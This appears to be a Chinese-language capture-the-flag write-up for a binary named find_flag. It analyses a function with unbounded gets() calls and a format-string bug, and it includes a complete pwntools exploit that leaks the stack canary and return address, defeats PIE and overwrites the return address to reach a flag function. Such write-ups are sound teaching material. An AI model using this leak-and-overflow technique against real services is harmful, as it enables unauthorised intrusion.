解题过程
分析 find_flag 程序，漏洞位于 sub_132F 函数中。该函数实际上有两个问题：其一，两次调用 gets 读入数据且不限制长度，存在栈溢出；其二，第一次读入的 name 缓冲区在追加 "!\n" 后被直接作为 printf 的第一个参数（格式串）输出，存在格式化字符串漏洞，可用 "%N$lx" 读取栈上的 canary（rbp-8）和返回地址，从而同时绕过 Canary 和 PIE。反汇编如下所示:
; sub_132F: prompts for a name and a second line. Stack frame (0x60 bytes):
;   rbp-0x60  name buffer  (first gets; 0x58 bytes below the canary)
;   rbp-0x40  second buffer (second gets; 0x38 = 56 bytes below the canary)
;   rbp-0x08  stack canary copied from fs:28h
;   rbp+0x08  return address into main
; Two bugs: both reads use an unbounded gets(), and the name buffer is passed
; as the format string of the print routine (sub_1100, presumably printf).
.text:000000000000132F sub_132F proc near ; CODE XREF: main+71↓p
.text:000000000000132F; __unwind {
.text:000000000000132F endbr64
.text:0000000000001333 push rbp
.text:0000000000001334 mov rbp, rsp
.text:0000000000001337sub rsp, 60h ; 0x60-byte frame; rsp == rbp-60h == start of the name buffer
.text:000000000000133B mov rax, fs:28h ; load the stack-protector canary from TLS
.text:0000000000001344 mov [rbp-8], rax ; store it just below the saved rbp
.text:0000000000001348 xor eax, eax
.text:000000000000134A lea rdi, aHiWhatSYourNam ; "Hi! What's your name? "
.text:0000000000001351 mov eax, 0 ; eax=0: no vector registers used by the varargs call
.text:0000000000001356 call sub_1100 ; presumably printf (format in rdi)
.text:000000000000135B lea rax, [rbp-60h] ; name buffer
.text:000000000000135F mov rdi, rax
.text:0000000000001362 mov eax, 0
.text:0000000000001367 call sub_1110 ; gets() reads the name with no length limit (stack overflow #1)
.text:000000000000136C lea rdi, aNiceToMeetYou ; "Nice to meet you, "
.text:0000000000001373 mov eax, 0
.text:0000000000001378 call sub_1100
.text:000000000000137D lea rax, [rbp-60h]
.text:0000000000001381 mov rcx, 0FFFFFFFFFFFFFFFFh ; rcx = -1: inlined strlen() via repne scasb
.text:0000000000001388 mov rdx, rax
.text:000000000000138B mov eax, 0 ; al = 0 is the byte scasb looks for
.text:0000000000001390 mov rdi, rdx
.text:0000000000001393 repne scasb ; scan the name until its NUL terminator
.text:0000000000001395 mov rax, rcx
.text:0000000000001398not rax ; ~rcx == len + 1
.text:000000000000139B lea rdx, [rax-1] ; rdx = strlen(name)
.text:000000000000139F lea rax, [rbp-60h]
.text:00000000000013A3 add rax, rdx ; rax = &name[len]
.text:00000000000013A6 mov word ptr [rax], 0A21h ; append "!\n" (little-endian: 0x21 '!', 0x0A '\n')
.text:00000000000013AB mov byte ptr [rax+2], 0 ; new NUL terminator
.text:00000000000013AF lea rax, [rbp-60h]
.text:00000000000013B3 mov rdi, rax ; the user-controlled name is the FIRST argument ...
.text:00000000000013B6 mov eax, 0
.text:00000000000013BB call sub_1100 ; ... i.e. the format string. With the buffer at rsp (%6$), "%17$lx" reads the canary at rbp-8 and "%19$lx" the return address at rbp+8
.text:00000000000013C0 lea rdi, aAnythingElse ; "Anything else? "
.text:00000000000013C7 mov eax, 0
.text:00000000000013CC call sub_1100
.text:00000000000013D1 lea rax, [rbp-40h] ; second buffer: only 56 bytes below the canary
.text:00000000000013D5 mov rdi, rax
.text:00000000000013D8 mov eax, 0
.text:00000000000013DD call sub_1110 ; gets() again, unbounded (stack overflow #2): 56 bytes of filler, then the leaked canary, a dummy saved rbp, then the return address
.text:00000000000013E2 nop
.text:00000000000013E3 mov rax, [rbp-8] ; stack-protector epilogue: compare the stored canary ...
.text:00000000000013E7 xor rax, fs:28h ; ... against the TLS value
.text:00000000000013F0 jz short locret_13F7 ; canary intact: normal return
.text:00000000000013F2 call sub_10D0 ; otherwise presumably __stack_chk_fail
.text:00000000000013F7
.text:00000000000013F7 locret_13F7: ; CODE XREF: sub_132F+C1↑j
.text:00000000000013F7 leave
.text:00000000000013F8 retn ; pops the (possibly overwritten) return address
.text:00000000000013F8; } // starts at 132F
.text:00000000000013F8 sub_132F endp
利用代码如下所示:
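"""Exploit for find_flag: leak the canary and a return address through the
format-string bug in sub_132F, then overflow the second gets() buffer to
return into the flag function.

Stack layout of sub_132F (from the disassembly): the name buffer sits at
rbp-0x60 (== rsp), the second buffer at rbp-0x40, the canary at rbp-0x8 and
the return address at rbp+0x8.  printf's positional arguments %1$..%5$ are
rsi..r9, so %6$ is the first stack qword (the name buffer itself), %17$ the
canary and %19$ the saved return address.
"""
import struct

# Sent as the "name"; the program later passes the name buffer to printf as
# the format string, so these read the canary and the return address.
FMT_LEAK = "%17$lx,%19$lx"
# Offset of the target (presumably the flag-printing function) inside the PIE image.
FLAG_OFFSET = 0x0000000000001231
# Offset, inside the PIE image, of the address sub_132F returns to in main.
# Subtracting it from the leaked return address yields the PIE base.
RET_OFFSET = 0x146F
# The second gets() buffer (rbp-0x40) is 0x38 = 56 bytes below the canary.
OVERFLOW_LEN = 56
# Text the program prints before echoing the (expanded) name.
GREETING_PREFIX = "Nice to meet you, "


def parse_leak(greeting: str) -> tuple[int, int]:
    """Return (canary, return_address) parsed from the echoed greeting line.

    The target prints ``"Nice to meet you, " + name + "!\\n"``; with FMT_LEAK
    as the name, ``name`` expands to ``"<canary hex>,<return address hex>"``.

    Raises:
        ValueError: the line does not have that shape, or the values fail
            the sanity checks (the leak then hit the wrong stack slots).
    """
    _, found, rest = greeting.partition(GREETING_PREFIX)
    if not found:
        raise ValueError(f"unexpected greeting: {greeting!r}")
    leaked = rest.split("!", 1)[0]
    try:
        canary_hex, ret_hex = leaked.split(",")
        canary, ret = int(canary_hex, 16), int(ret_hex, 16)
    except ValueError as err:
        raise ValueError(f"could not parse leaked values from {leaked!r}") from err
    # glibc keeps the canary's low byte zero (so string functions stop on it);
    # a non-zero low byte means %17$ is not the canary slot.
    if canary & 0xFF:
        raise ValueError(f"canary {canary:#x} has a non-zero low byte; wrong stack slot?")
    # The PIE base is page aligned, so the leaked return address must share its
    # low 12 bits with RET_OFFSET; otherwise %19$ is not the return slot (or
    # RET_OFFSET is wrong for this build of the binary).
    if (ret ^ RET_OFFSET) & 0xFFF:
        raise ValueError(f"return address {ret:#x} does not match RET_OFFSET {RET_OFFSET:#x}")
    return canary, ret


def build_payload(canary: int, pie_base: int) -> bytes:
    """Build the second input line for the overflow.

    Layout: 56 bytes of filler up to the canary, the leaked canary (so the
    stack-protector check passes), 8 dummy bytes for the saved rbp, then the
    runtime address of the flag function as the new return address.

    Raises:
        ValueError: the payload contains 0x0a.  gets() stops at a newline,
            which would silently truncate the overflow; rerun against a fresh
            process to get a different canary / base.
    """
    payload = b"".join((
        b"A" * OVERFLOW_LEN,
        struct.pack("<Q", canary),
        b"A" * 8,
        struct.pack("<Q", pie_base + FLAG_OFFSET),
    ))
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte; gets() would truncate it")
    return payload


def main() -> None:
    """Run the exploit against the remote (or a local process)."""
    # Imported here so parse_leak/build_payload stay importable without pwntools.
    from pwn import remote  # noqa: PLC0415

    p = remote("127.0.0.1", 20701)
    # p = process('./canary')
    print(p.recvuntil(b"name? ").decode())
    p.sendline(FMT_LEAK.encode())
    greeting = p.recvuntil(b"!\n").decode()
    print(greeting)
    canary, ret = parse_leak(greeting)
    pie_base = ret - RET_OFFSET
    print(f"canary = {canary:#x}  ret = {ret:#x}  pie base = {pie_base:#x}")
    print(p.recvuntil(b"? ").decode())
    # NOTE(review): returning straight into a function leaves rsp 8 bytes off
    # the 16-byte ABI alignment; if the target crashes on an SSE instruction,
    # put a single `ret` gadget in front of the flag address.
    p.sendline(build_payload(canary, pie_base))
    p.interactive()


if __name__ == "__main__":
    main()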